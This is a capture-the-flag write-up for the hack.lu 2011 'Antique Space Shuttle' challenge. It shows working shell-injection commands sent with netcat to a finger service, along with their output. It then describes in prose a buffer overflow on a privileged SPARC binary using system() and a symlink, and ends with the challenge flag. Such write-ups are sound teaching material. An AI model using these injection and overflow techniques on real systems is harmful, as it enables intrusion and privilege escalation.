Sep 21

hack.lu CTF 2011 Antique Space Shuttle (300)

Category: exploiting

Your command is to get as much information about the crew of an antique space shuttle. We know our acient father used finger as reference point at

nc ctf.hack.lu 2003

Summary: bash injection, and buffer overflow on a suid binary to get more privilegies

After playing around with netcat, we see that sending random words closes the connection, and whitespace or ‘;’ gives output:

$ echo | nc ctf.hack.lu 2003
Login    Name                Tty      Idle  Login Time   Office     Office Phone
user                         pts/0    9:02  Tue 23:36    
user                         pts/1   10:42  Tue 13:38    
user                         pts/10   1:29  Wed 07:54
...

According to the task description, we can determine that it’s finger. Looks like it’s shell command injection. finger accepts username, let’s try user:

echo user | nc ctf.hack.lu 2003
Login: nobody                     Name: Unprivileged user
Directory: /nonexistent                 Shell: /sbin/nologin
Never logged in.
No Mail.
No Plan.

Login: user                       Name: 
Directory: /home/user                   Shell: /usr/pkg/bin/bash
On since Tue Sep 20 23:36 (CEST) on pts/0,  idle 9:04, from 149.13.33.74
...

Yeah. But why another words don’t produce any output? Maybe stderr is not sent?

$ echo 'test 2>&1' | nc ctf.hack.lu 2003
finger: test: no such user

Right! Let’s try inject:

$ echo '$(ls -al) 2>&1' | nc ctf.hack.lu 2003
finger: total: no such user
finger: 28: no such user
finger: drwxr-xr-x: no such user
...

Oh, it splits on spaces! Also there’s no base64 there. Luckily, tr was present:

$ echo '$(ls -al | tr " " ".") 2>&1' | nc ctf.hack.lu 2003
finger: total.28: no such user
finger: drwxr-xr-x..2.root..users.....512.Sep.19.19:28..: no such user
finger: drwxr-xr-x..4.root..wheel.....512.Sep..8.21:15...: no such user
finger: lrwxr-xr-x..1.root..users.......9.Sep..8.22:20..bash_history.->./dev/null: no such user
finger: -r-xr-sr-x..1.root..leaders..4796.Sep..8.22:57.auth: no such user
finger: -rwxr-xr-x..1.root..users.....961.Sep.20.10:51.finger.py: no such user
finger: -rw-r--r--..1.root..users.....139.Sep.20.14:09.info: no such user

$ echo '$(cat info | tr " " ".") 2>&1' | nc ctf.hack.lu 2003
finger: Ok.so.you.got.access,.now.try.to.get.more.privileges.by.exploiting: no such user
finger: the.auth.protocol..you.can.login.to.ssh.at.port.2004: no such user
finger: with.user:user4422: no such user

Wait.. Where’s the flag??? GIMME MY FLAG!!!1

No, we have to ssh there and exploit a binary. Also, it’s a SPARC arch, so it’ll be a great fun.

If you want to have a look at the binary, here it is.

Shortly, you pass two arguments to a program: text and a number. If number is greater than 8, program exits, else does a strcpy of our text. Using -1 makes buffer overflow possible.

Stack is not executable, but ASLR is not present. So we can use libc functions directly. system & symlink technique works here.

Buffer must be composed in a way to overwrite some return address with &system-8 and other dwords should be valid frame pointers. Than we look name of the command passed to system in gdb, and create a symlink to /usr/pkg/bin/bash. Don’t forget to add current directory to PATH.

That’s it!

The flag: a3YCcRtDqLMp0OK2

PS. You can try finger.py if you want.

hellman

Leave a Reply

Your email address will not be published.